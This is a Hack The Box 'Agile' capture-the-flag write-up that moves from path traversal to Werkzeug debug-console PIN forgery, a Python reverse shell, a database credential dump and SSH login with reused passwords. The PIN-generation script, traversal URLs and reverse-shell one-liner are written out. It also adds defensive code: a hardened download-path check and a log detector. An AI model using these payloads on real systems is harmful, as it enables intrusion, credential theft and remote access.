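Agile-htb-writeup

0x00 Lab skills overview

Skills in this chapter: local file inclusion, Werkzeug console exploitation, database passwords, password reuse, port forwarding, internal test-site vulnerabilities, CVE-2023-22809, sudo

Reference: https://otrashoui.xyz/agile/#edwards-to-root

Reference: https://0xdf.gitlab.io/2023/08/05/htb-agile.html#shell-as-edwards

0x01 Gaining user access

1. About the target

About Agile
Agile is a medium-difficulty Linux machine with a password management website on port 80. After creating an account and adding a few passwords, the site's export-to-CSV feature is found to be vulnerable to arbitrary file read. Enumerating other endpoints shows that /download throws an error when accessed and brings up the Werkzeug debug console. The console is protected by a PIN; however, combined with the ability to read files through the vulnerability above, a user can reverse-engineer this PIN and execute system commands as www-data. Database credentials can then be identified in order to connect to the password manager site's SQL database, which holds the credentials of the corum user on the system. A second version of the site is found to be running, and an automated system tests it through the Selenium web driver. Selenium's debug port is open, and through an SSH tunnel an attacker can access the site's test environment and obtain the credentials of the user edwards. Finally, a combination of CVE-2023-22809, a custom entry in the global bashrc file, and incorrect permissions on the Python virtual environment activation script leads to privilege escalation.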

2. Test connectivity to the target

┌──(kali㉿offsec)-[~/Desktop]
└─$ ping 10.10.11.203 -c 4
PING 10.10.11.203 (10.10.11.203) 56(84) bytes of data.
64 bytes from 10.10.11.203: icmp_seq=1 ttl=63 time=188 ms
64 bytes from 10.10.11.203: icmp_seq=2 ttl=63 time=132 ms
64 bytes from 10.10.11.203: icmp_seq=3 ttl=63 time=167 ms

--- 10.10.11.203 ping statistics ---
4 packets transmitted, 3 received, 25% packet loss, time 2997ms
rtt min/avg/max/mdev = 131.721/162.177/187.679/23.111 ms

3. Scan for open ports

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p- -Pn 10.10.11.203 --min-rate=10000
[sudo] kali 的密码:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-27 11:29 CST
Warning: 10.10.11.203 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.11.203
Host is up (0.13s latency).
Not shown: 64905 closed tcp ports (reset), 628 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http

Nmap done: 1 IP address (1 host up) scanned in 33.88 seconds

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p22,80 -Pn 10.10.11.203 --min-rate=10000 -sC -sV
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-27 11:35 CST
Nmap scan report for 10.10.11.203
Host is up (0.13s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 f4:bc:ee:21:d7:1f:1a:a2:65:72:21:2d:5b:a6:f7:00 (ECDSA)
|_ 256 65:c1:48:0d:88:cb:b9:75:a0:2c:a5:e6:37:7e:51:06 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://superpass.htb
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.62 seconds

4. In my experience, the fewer ports a target exposes, the harder it tends to be. First, add the hostname to /etc/hosts.

┌──(kali㉿offsec)-[~/Desktop]
└─$ echo "10.10.11.203 superpass.htb" | sudo tee -a /etc/hosts
10.10.11.203 superpass.htb

5. Look at the home page

http://superpass.htb

http://superpass.htb/account/login

http://superpass.htb/account/register

6. Here I register an account

shiyan

MM123456

7. During registration an error report shows up intermittently, which brings up the Werkzeug console

/app/venv/lib/python3.10/site-packages/sqlalchemy/engine/base.py

8. After logging in, the site presents a password-vault interface

http://superpass.htb/vault

9. While trying the password export, I found the vulnerable spot

GET /download?fn=shiyan_export_372dc96379.csv HTTP/1.1
Host: superpass.htb
User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: remember_token=9|a275b2aea46e42270522571f45b406fb088ac53b8e03bcba8b41bc6365aca4109f0e62f2ca673de535c3986fa0187e878ba0753683e6790585356dc6c228f8fe; session=.eJwljjEOwzAIAP_iuYPBBpx8JgIMatekmar-vamynXQ66T5lyz2OZ1nf-xmPsr1mWYtYRYg6QCYbdkFaTAOd8iKA4cwSMDOFBaFaTW4kE7UFDQJO525_YWjSeutXOLJXTeiEBotWHUokJO4tsIl6engCSGrHco2cR-z3zVK-P1QNLpM.ZvYmrQ.6u8AztLpBDFVA4ZT5NDEqE2g06w
Upgrade-Insecure-Requests: 1

10. This looks like a local file inclusion vulnerability

http://superpass.htb/download?fn=../../../../../../../../../../etc/hosts

11. Next, read the local users

http://superpass.htb/download?fn=../../../../../../../../../../etc/passwd

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:104::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:104:105:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
pollinate:x:105:1::/var/cache/pollinate:/bin/false
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
usbmux:x:107:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
corum:x:1000:1000:corum:/home/corum:/bin/bash
dnsmasq:x:108:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
mysql:x:109:112:MySQL Server,,,:/nonexistent:/bin/false
runner:x:1001:1001::/app/app-testing/:/bin/sh
edwards:x:1002:1002::/home/edwards:/bin/bash
dev_admin:x:1003:1003::/home/dev_admin:/bin/bash
_laurel:x:999:999::/var/log/laurel:/bin/false

12. There are two regular users, but we have no permission to read their SSH keys
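
The traversal in steps 10 and 11 works when the fn parameter is joined to a directory without validation. The following is an added example, not the application's own code: the bug pattern next to a hardened lookup, where the /app/exports directory, the "<username>_export_<hex>.csv" naming policy and the function names are assumptions for illustration.

```python
import os
import re
import tempfile

# Assumed naming policy, modelled on shiyan_export_372dc96379.csv from the
# request in step 9: "<username>_export_<hex>.csv" and nothing else.
EXPORT_NAME = re.compile(r"[A-Za-z0-9]+_export_[0-9a-f]+\.csv")


def naive_path(export_dir, fn):
    """Bug pattern: the fn parameter is joined to the export directory as-is."""
    return os.path.normpath(os.path.join(export_dir, fn))


def safe_path(export_dir, fn, username):
    """Return the real path of an export `username` may download, else None."""
    # 1. Allow-list the file name: no separators, no "..", fixed suffix.
    if not EXPORT_NAME.fullmatch(fn):
        return None
    # 2. The export must belong to the logged-in user.
    if not fn.startswith(username + "_export_"):
        return None
    # 3. Resolve symlinks on both sides and require containment in export_dir.
    base = os.path.realpath(export_dir)
    target = os.path.realpath(os.path.join(base, fn))
    if os.path.commonpath([base, target]) != base:
        return None
    # 4. Serve regular files only.
    return target if os.path.isfile(target) else None


def demo():
    """Run the page's payload and some edge cases against a scratch directory."""
    with tempfile.TemporaryDirectory() as tmp:
        export_dir = os.path.join(tmp, "exports")
        os.mkdir(export_dir)
        legit = "shiyan_export_372dc96379.csv"
        with open(os.path.join(export_dir, legit), "w") as fh:
            fh.write("Site,Username,Password\n")
        # Constructed edge case: a validly named symlink pointing outside.
        secret = os.path.join(tmp, "secret.txt")
        with open(secret, "w") as fh:
            fh.write("constructed secret\n")
        os.symlink(secret, os.path.join(export_dir, "shiyan_export_0badc0de.csv"))

        requests = {
            "legit": (legit, "shiyan"),
            "traversal": ("../../../../../../../../../../etc/passwd", "shiyan"),
            "absolute": ("/etc/machine-id", "shiyan"),
            "symlink": ("shiyan_export_0badc0de.csv", "shiyan"),
            "other_user": (legit, "corum"),
        }
        results = {}
        base = os.path.realpath(export_dir)
        for name, (fn, user) in requests.items():
            path = safe_path(export_dir, fn, user)
            # Report paths relative to export_dir so the output is stable.
            results[name] = os.path.relpath(path, base) if path else None
        return results


if __name__ == "__main__":
    print(naive_path("/app/exports", "../../../../../../../../../../etc/passwd"))
    for case, outcome in demo().items():
        print(f"{case:11} -> {outcome}")
```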

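13. At this point the local file inclusion has to be combined with the Werkzeug console to get an initial shell. The reference article for the technique is below.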

https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/werkzeug

14. Some prerequisites

To exploit the console PIN, two sets of variables are needed, probably_public_bits and private_bits:

probably_public_bits
username: the user who started the Flask session.

modname: usually flask.app.

getattr(app, '__name__', getattr(app.__class__, '__name__')): usually resolves to Flask.

getattr(mod, '__file__', None): the full path to app.py inside the Flask directory (for example, /usr/local/lib/python3.5/dist-packages/flask/app.py). If app.py does not work, try app.pyc.


private_bits
uuid.getnode(): gets the MAC address of the current machine; str(uuid.getnode()) converts it to decimal.

To determine the server's MAC address, identify the active network interface used by the application (for example, ens3). If unsure, leak /proc/net/arp to find the device ID, then extract the MAC address from /sys/class/net/<device id>/address.

A hexadecimal MAC address can be converted to decimal as follows:

# Example MAC address: 56:00:02:7a:23:ac
>>> print(0x5600027a23ac)
94558041547692

get_machine_id(): concatenates the data from /etc/machine-id or /proc/sys/kernel/random/boot_id with the part of the first line of /proc/self/cgroup after the last slash (/).

15. The full exploitation process follows

http://superpass.htb/download?fn=../../../../../../../../../../proc/net/arp

http://superpass.htb/download?fn=../../../../../sys/class/net/eth0/address

http://superpass.htb/download?fn=../../../../../../../../../../etc/machine-id

http://superpass.htb/download?fn=../../../../../proc/self/cgroup

http://superpass.htb/download?fn=../../../../../proc/sys/kernel/random/boot_id
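
The requests in step 15 leave a recognisable pattern in the web server's access log: one client reading the PIN inputs from step 14 through the fn parameter. The following is an added detection example, not part of the original writeup; the log lines are constructed in nginx combined format with documentation-range IP addresses, and the function names are illustrative.

```python
import posixpath
import re
from collections import defaultdict
from urllib.parse import parse_qs, unquote, urlsplit

# nginx "combined" format: ip - user [time] "METHOD target PROTO" status ...
LOG_LINE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]*\] "[A-Z]+ (?P<target>\S+) [^"]*" \d{3} ')

# Files that step 14 lists as inputs to the console PIN.
PIN_INPUTS = {
    "machine-id": re.compile(r"/etc/machine-id"),
    "boot_id": re.compile(r"/proc/sys/kernel/random/boot_id"),
    "cgroup": re.compile(r"/proc/(self|\d+)/cgroup"),
    "arp": re.compile(r"/proc/net/arp"),
    "mac": re.compile(r"/sys/class/net/[^/]+/address"),
}
MACHINE_ID_SOURCES = {"machine-id", "boot_id"}  # feed get_machine_id()


def escaped_path(value):
    """Return the absolute path a parameter value resolves to if it leaves the
    download directory, else None. "/base" is a notional one-level root."""
    for _ in range(3):  # undo double or triple percent-encoding
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    resolved = posixpath.normpath(posixpath.join("/base", value.replace("\\", "/")))
    resolved = "/" + resolved.lstrip("/")  # normpath keeps a leading "//"
    if resolved == "/base" or resolved.startswith("/base/"):
        return None
    return resolved


def find_pin_recon(lines, endpoint="/download", param="fn"):
    """Group traversal requests by client and flag PIN-input collection."""
    clients = defaultdict(lambda: {"traversals": 0, "pin_inputs": set()})
    for line in lines:
        match = LOG_LINE.match(line)
        if not match:
            continue
        target = urlsplit(match.group("target"))
        if target.path != endpoint:
            continue
        for value in parse_qs(target.query).get(param, []):
            resolved = escaped_path(value)
            if resolved is None:
                continue
            entry = clients[match.group("ip")]
            entry["traversals"] += 1
            for label, pattern in PIN_INPUTS.items():
                if pattern.fullmatch(resolved):
                    entry["pin_inputs"].add(label)
    return {
        ip: {
            "traversals": e["traversals"],
            "pin_inputs": sorted(e["pin_inputs"]),
            # Both private_bits sources read: MAC address and machine id.
            "pin_recon": "mac" in e["pin_inputs"]
            and bool(e["pin_inputs"] & MACHINE_ID_SOURCES),
        }
        for ip, e in clients.items()
    }


# Constructed sample log lines (not taken from the target).
TS = "[27/Sep/2024:11:41:02 +0800]"
SAMPLE_LOG = [
    f'198.51.100.7 - - {TS} "GET /download?fn=alice_export_5f2a9c.csv HTTP/1.1" 200 211 "-" "Mozilla/5.0"',
    f'192.0.2.10 - - {TS} "GET /download?fn=../../../../../../../../../../etc/passwd HTTP/1.1" 200 1744 "-" "Mozilla/5.0"',
    f'192.0.2.10 - - {TS} "GET /download?fn=../../../../../../../../../../proc/net/arp HTTP/1.1" 200 156 "-" "Mozilla/5.0"',
    f'192.0.2.10 - - {TS} "GET /download?fn=../../../../../sys/class/net/eth0/address HTTP/1.1" 200 18 "-" "Mozilla/5.0"',
    f'192.0.2.10 - - {TS} "GET /download?fn=..%252f..%252f..%252fetc%252fmachine-id HTTP/1.1" 200 33 "-" "Mozilla/5.0"',
    f'192.0.2.10 - - {TS} "GET /download?fn=../../../../../proc/self/cgroup HTTP/1.1" 200 35 "-" "Mozilla/5.0"',
    f'203.0.113.5 - - {TS} "GET /download?fn=../../etc/hosts HTTP/1.1" 500 265 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, finding in find_pin_recon(SAMPLE_LOG).items():
        print(ip, finding)
```

A client flagged with pin_recon has read both private_bits sources, so the debug console PIN should be treated as known to that client.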

16. The hexadecimal MAC address is converted to decimal as follows

┌──(kali㉿offsec)-[~/Desktop]
└─$ python3
Python 3.11.9 (main, Apr 10 2024, 13:16:36) [GCC 13.2.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> print(0x005056b93312)
345052361490
>>> exit()

17. The exploit code:

import hashlib
from itertools import chain

probably_public_bits = [
    'www-data',  # username
    'flask.app',  # modname
    'wsgi_app',  # getattr(app, '__name__', getattr(app.__class__, '__name__'))
    '/app/venv/lib/python3.10/site-packages/flask/app.py'  # getattr(mod, '__file__', None),
]

private_bits = [
    '345052361490',  # str(uuid.getnode()), /sys/class/net/ens33/address
    'ed5b159560f54721827644bc9b220d00superpass.service'  # get_machine_id(), /etc/machine-id
]

# h = hashlib.md5() # Changed in https://werkzeug.palletsprojects.com/en/2.2.x/changes/#version-2-0-0
h = hashlib.sha1()
for bit in chain(probably_public_bits, private_bits):
    if not bit:
        continue
    if isinstance(bit, str):
        bit = bit.encode('utf-8')
    h.update(bit)
h.update(b'cookiesalt')
# h.update(b'shittysalt')

cookie_name = '__wzd' + h.hexdigest()[:20]

num = None
if num is None:
    h.update(b'pinsalt')
    num = ('%09d' % int(h.hexdigest(), 16))[:9]

rv = None
if rv is None:
    for group_size in 5, 4, 3:
        if len(num) % group_size == 0:
            rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
                          for x in range(0, len(num), group_size))
            break
    else:
        rv = num

print(rv)

18. Run the script

┌──(kali㉿offsec)-[~/Desktop]
└─$ python3 pin.py
629-963-121

19. After entering the PIN above, the console unlocks

[console ready]
>>> os.popen('id').read()
'uid=33(www-data) gid=33(www-data) groups=33(www-data)\n'
>>>

20. The PIN was accepted, the debug console opened, and command execution works. Next, get a shell.

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.22",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("bash")

21. The reverse shell connects back

┌──(kali㉿offsec)-[~/Desktop]
└─$ rlwrap nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.22] from (UNKNOWN) [10.10.11.203] 40378
(venv) www-data@agile:/app/app$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
(venv) www-data@agile:/app/app$

22. Next, by reading the config file and logging in to the database, I found several passwords

(venv) www-data@agile:/app/app$ ls -la
ls -la
total 28
drwxr-xr-x 5 corum runner 4096 Feb 8 2023 .
drwxr-xr-x 6 root root 4096 Mar 8 2023 ..
drwxrwxr-x 3 corum runner 4096 Feb 8 2023 .pytest_cache
drwxr-xr-x 2 corum runner 4096 Feb 8 2023 __pycache__
-rw-rw-r-- 1 corum runner 95 Jan 23 2023 requirements.txt
drwxrwxr-x 9 corum runner 4096 Mar 7 2023 superpass
-rw-r--r-- 1 corum runner 105 Jan 24 2023 wsgi.py
(venv) www-data@agile:/app/app$ cd ../
cd ../
(venv) www-data@agile:/app$ ls -la
ls -la
total 36
drwxr-xr-x 6 root root 4096 Mar 8 2023 .
drwxr-xr-x 20 root root 4096 Feb 20 2023 ..
drwxr-xr-x 3 root root 4096 Jan 23 2023 .pytest_cache
drwxr-xr-x 5 corum runner 4096 Feb 8 2023 app
drwxr-xr-x 9 runner runner 4096 Feb 8 2023 app-testing
-r--r----- 1 dev_admin www-data 88 Jan 25 2023 config_prod.json
-r--r----- 1 dev_admin runner 99 Jan 25 2023 config_test.json
-rwxr-xr-x 1 root runner 557 Sep 29 08:39 test_and_update.sh
drwxrwxr-x 5 root dev_admin 4096 Feb 8 2023 venv
(venv) www-data@agile:/app$ cat config_prod.json
cat config_prod.json
{"SQL_URI": "mysql+pymysql://superpassuser:dSA6l7q*yIVs$39Ml6ywvgK@localhost/superpass"}(venv) www-data@agile:/app$

(venv) www-data@agile:/app$ cat config_test.json
cat config_test.json
cat: config_test.json: Permission denied
(venv) www-data@agile:/app$


(venv) www-data@agile:/app$ ls -la /home/
ls -la /home/
total 20
drwxr-xr-x 5 root root 4096 Feb 8 2023 .
drwxr-xr-x 20 root root 4096 Feb 20 2023 ..
drwxr-x--- 8 corum corum 4096 Feb 8 2023 corum
drwxr-x--- 2 dev_admin dev_admin 4096 Feb 8 2023 dev_admin
drwxr-x--- 5 edwards edwards 4096 Feb 8 2023 edwards
(venv) www-data@agile:/app$



(venv) www-data@agile:/app$ mysql -u superpassuser -p'dSA6l7q*yIVs$39Ml6ywvgK'
< mysql -u superpassuser -p'dSA6l7q*yIVs$39Ml6ywvgK'
mysql: [Warning] Using a password on the command line interface can be insecure.
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 32
Server version: 8.0.32-0ubuntu0.22.04.2 (Ubuntu)

Copyright (c) 2000, 2023, Oracle and/or its affiliates.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql>
mysql> SSELECT table_schema, table_name FROM information_schema.tables
SELECT table_schema, table_name FROM information_schema.tables
-> ;
;
+--------------------+---------------------------------------+
| TABLE_SCHEMA | TABLE_NAME |
+--------------------+---------------------------------------+
| information_schema | CHARACTER_SETS |
| information_schema | CHECK_CONSTRAINTS |
| information_schema | COLLATIONS |
| information_schema | COLLATION_CHARACTER_SET_APPLICABILITY |
| information_schema | COLUMNS |
| information_schema | COLUMNS_EXTENSIONS |
| information_schema | COLUMN_STATISTICS |
| information_schema | EVENTS |
| information_schema | FILES |
| information_schema | INNODB_DATAFILES |
| information_schema | INNODB_FOREIGN |
| information_schema | INNODB_FOREIGN_COLS |
| information_schema | INNODB_FIELDS |
| information_schema | INNODB_TABLESPACES_BRIEF |
| information_schema | KEY_COLUMN_USAGE |
| information_schema | KEYWORDS |
| information_schema | PARAMETERS |
| information_schema | PARTITIONS |
| information_schema | REFERENTIAL_CONSTRAINTS |
| information_schema | RESOURCE_GROUPS |
| information_schema | ROUTINES |
| information_schema | SCHEMATA |
| information_schema | SCHEMATA_EXTENSIONS |
| information_schema | ST_SPATIAL_REFERENCE_SYSTEMS |
| information_schema | ST_UNITS_OF_MEASURE |
| information_schema | ST_GEOMETRY_COLUMNS |
| information_schema | STATISTICS |
| information_schema | TABLE_CONSTRAINTS |
| information_schema | TABLE_CONSTRAINTS_EXTENSIONS |
| information_schema | TABLES |
| information_schema | TABLES_EXTENSIONS |
| information_schema | TABLESPACES_EXTENSIONS |
| information_schema | TRIGGERS |
| information_schema | VIEW_ROUTINE_USAGE |
| information_schema | VIEW_TABLE_USAGE |
| information_schema | VIEWS |
| information_schema | COLUMN_PRIVILEGES |
| information_schema | ENGINES |
| information_schema | OPTIMIZER_TRACE |
| information_schema | PLUGINS |
| information_schema | PROCESSLIST |
| information_schema | PROFILING |
| information_schema | SCHEMA_PRIVILEGES |
| information_schema | TABLESPACES |
| information_schema | TABLE_PRIVILEGES |
| information_schema | USER_PRIVILEGES |
| information_schema | ENABLED_ROLES |
| information_schema | APPLICABLE_ROLES |
| information_schema | ADMINISTRABLE_ROLE_AUTHORIZATIONS |
| information_schema | ROLE_COLUMN_GRANTS |
| information_schema | ROLE_ROUTINE_GRANTS |
| information_schema | ROLE_TABLE_GRANTS |
| information_schema | USER_ATTRIBUTES |
| information_schema | INNODB_SESSION_TEMP_TABLESPACES |
| information_schema | INNODB_VIRTUAL |
| information_schema | INNODB_BUFFER_POOL_STATS |
| information_schema | INNODB_BUFFER_PAGE |
| information_schema | INNODB_CMPMEM_RESET |
| information_schema | INNODB_CMPMEM |
| information_schema | INNODB_TRX |
| information_schema | INNODB_CMP_PER_INDEX_RESET |
| information_schema | INNODB_CMP_RESET |
| information_schema | INNODB_FT_DEFAULT_STOPWORD |
| information_schema | INNODB_METRICS |
| information_schema | INNODB_TEMP_TABLE_INFO |
| information_schema | INNODB_FT_DELETED |
| information_schema | INNODB_TABLESTATS |
| information_schema | INNODB_CMP |
| information_schema | INNODB_TABLES |
| information_schema | INNODB_FT_BEING_DELETED |
| information_schema | INNODB_BUFFER_PAGE_LRU |
| information_schema | INNODB_CMP_PER_INDEX |
| information_schema | INNODB_FT_CONFIG |
| information_schema | INNODB_CACHED_INDEXES |
| information_schema | INNODB_FT_INDEX_TABLE |
| information_schema | INNODB_COLUMNS |
| information_schema | INNODB_FT_INDEX_CACHE |
| information_schema | INNODB_INDEXES |
| information_schema | INNODB_TABLESPACES |
| performance_schema | processlist |
| performance_schema | session_account_connect_attrs |
| performance_schema | global_status |
| performance_schema | session_status |
| performance_schema | global_variables |
| performance_schema | session_variables |
| performance_schema | variables_info |
| performance_schema | persisted_variables |
| superpass | users |
| superpass | passwords |
+--------------------+---------------------------------------+
89 rows in set (0.01 sec)

mysql> select * from users;
select * from users;
ERROR 1046 (3D000): No database selected
mysql> sselect * from superpass.users;
select * from superpass.users;
+----+----------+--------------------------------------------------------------------------------------------------------------------------+
| id | username | hashed_password |
+----+----------+--------------------------------------------------------------------------------------------------------------------------+
| 1 | 0xdf | $6$rounds=200000$FRtvqJFfrU7DSyT7$8eGzz8Yk7vTVKudEiFBCL1T7O4bXl0.yJlzN0jp.q0choSIBfMqvxVIjdjzStZUYg6mSRB2Vep0qELyyr0fqF. |
| 2 | corum | $6$rounds=200000$yRvGjY1MIzQelmMX$9273p66QtJQb9afrbAzugxVFaBhb9lyhp62cirpxJEOfmIlCy/LILzFxsyWj/mZwubzWylr3iaQ13e4zmfFfB1 |
| 9 | shiyan | $6$rounds=200000$mUn/fLPlYLd/CAj5$RWO8cNhKGl4kVPXmlrTlPfzc.9abgX5yiTlaSl49VR9nT1fLz6DPENq6tKtApoJuMAY3.GWotfsmjBbEoQSiL0 |
+----+----------+--------------------------------------------------------------------------------------------------------------------------+
3 rows in set (0.00 sec)

mysql> select * from superpass.passwords;
select * from superpass.passwords;
+----+---------------------+---------------------+----------------+----------+----------------------+---------+
| id | created_date | last_updated_data | url | username | password | user_id |
+----+---------------------+---------------------+----------------+----------+----------------------+---------+
| 3 | 2022-12-02 21:21:32 | 2022-12-02 21:21:32 | hackthebox.com | 0xdf | 762b430d32eea2f12970 | 1 |
| 4 | 2022-12-02 21:22:55 | 2022-12-02 21:22:55 | mgoblog.com | 0xdf | 5b133f7a6a1c180646cb | 1 |
| 6 | 2022-12-02 21:24:44 | 2022-12-02 21:24:44 | mgoblog | corum | 47ed1e73c955de230a1d | 2 |
| 7 | 2022-12-02 21:25:15 | 2022-12-02 21:25:15 | ticketmaster | corum | 9799588839ed0f98c211 | 2 |
| 8 | 2022-12-02 21:25:27 | 2022-12-02 21:25:27 | agile | corum | 5db7caa1d13cc37c9fc2 | 2 |
+----+---------------------+---------------------+----------------+----------+----------------------+---------+
5 rows in set (0.00 sec)

mysql>

23. I tried cracking the hashes, but nothing came out right

24. Changing approach, I checked whether these values are themselves the passwords

┌──(kali㉿offsec)-[~/Desktop]
└─$ netexec ssh 10.10.11.203 -u corum -p passwd.txt
SSH 10.10.11.203 22 10.10.11.203 [*] SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1
SSH 10.10.11.203 22 10.10.11.203 [-] corum:762b430d32eea2f12970
SSH 10.10.11.203 22 10.10.11.203 [-] corum:5b133f7a6a1c180646cb
SSH 10.10.11.203 22 10.10.11.203 [-] corum:47ed1e73c955de230a1d
SSH 10.10.11.203 22 10.10.11.203 [-] corum:9799588839ed0f98c211
SSH 10.10.11.203 22 10.10.11.203 [+] corum:5db7caa1d13cc37c9fc2 Linux - Shell access!

25. They are, so log in directly

┌──(kali㉿offsec)-[~/Desktop]
└─$ ssh corum@10.10.11.203
The authenticity of host '10.10.11.203 (10.10.11.203)' can't be established.
ED25519 key fingerprint is SHA256:kxY+4fRgoCr8yE48B5Lb02EqxyyUN9uk6i/ZIH4H1pc.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.203' (ED25519) to the list of known hosts.
corum@10.10.11.203's password:
Welcome to Ubuntu 22.04.2 LTS (GNU/Linux 5.15.0-60-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

This system has been minimized by removing packages and content that are
not required on a system that users do not log into.

To restore this content, you can run the 'unminimize' command.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.

Last login: Wed Mar 8 15:25:35 2023 from 10.10.14.47
corum@agile:~$ id
uid=1000(corum) gid=1000(corum) groups=1000(corum)
corum@agile:~$

26. Grab the first flag

corum@agile:~$ ls -la
total 48
drwxr-x--- 8 corum corum 4096 Feb 8 2023 .
drwxr-xr-x 5 root root 4096 Feb 8 2023 ..
lrwxrwxrwx 1 root root 9 Feb 6 2023 .bash_history -> /dev/null
-rw-r--r-- 1 corum corum 220 Jan 6 2022 .bash_logout
-rw-r--r-- 1 corum corum 3771 Jan 6 2022 .bashrc
drwx------ 4 corum corum 4096 Feb 8 2023 .cache
drwxr-xr-x 4 corum corum 4096 Feb 8 2023 .config
drwx------ 3 corum corum 4096 Feb 8 2023 .local
drwx------ 3 corum corum 4096 Feb 8 2023 .pki
-rw-r--r-- 1 corum corum 807 Jan 6 2022 .profile
drwxrwxr-x 3 corum corum 4096 Feb 8 2023 .pytest_cache
drwx------ 2 corum corum 4096 Feb 8 2023 .ssh
-rw-r----- 1 root corum 33 Sep 29 08:13 user.txt
corum@agile:~$ cat user.txt
e1e4d14a28c36aedb1c5edb8447f8520
corum@agile:~$

0x02 Gaining system access

27. Continuing enumeration, I found the test site running

corum@agile:~$ cd /app/
corum@agile:/app$ ls -la
total 36
drwxr-xr-x 6 root root 4096 Mar 8 2023 .
drwxr-xr-x 20 root root 4096 Feb 20 2023 ..
drwxr-xr-x 3 root root 4096 Jan 23 2023 .pytest_cache
drwxr-xr-x 5 corum runner 4096 Feb 8 2023 app
drwxr-xr-x 9 runner runner 4096 Feb 8 2023 app-testing
-r--r----- 1 dev_admin www-data 88 Jan 25 2023 config_prod.json
-r--r----- 1 dev_admin runner 99 Jan 25 2023 config_test.json
-rwxr-xr-x 1 root runner 557 Sep 29 09:21 test_and_update.sh
drwxrwxr-x 5 root dev_admin 4096 Feb 8 2023 venv
corum@agile:/app$ cat test_and_update.sh
#!/bin/bash

# update prod with latest from testing constantly assuming tests are passing

echo "Starting test_and_update"
date

# if already running, exit
ps auxww | grep -v "grep" | grep -q "pytest" && exit

echo "Not already running. Starting..."

# start in dev folder
cd /app/app-testing

# system-wide source doesn't seem to happen in cron jobs
source /app/venv/bin/activate

# run tests, exit if failure
pytest -x 2>&1 >/dev/null || exit

# tests good, update prod (flask debug mode will load it instantly)
cp -r superpass /app/app/
echo "Complete!"
corum@agile:/app$

corum@agile:/app$ cd app-testing/
corum@agile:/app/app-testing$ ls -la
total 48
drwxr-xr-x 9 runner runner 4096 Feb 8 2023 .
drwxr-xr-x 6 root root 4096 Mar 8 2023 ..
drwxr-xr-x 3 runner runner 4096 Feb 8 2023 .cache
drwxrwxr-x 3 runner runner 4096 Jan 25 2023 .local
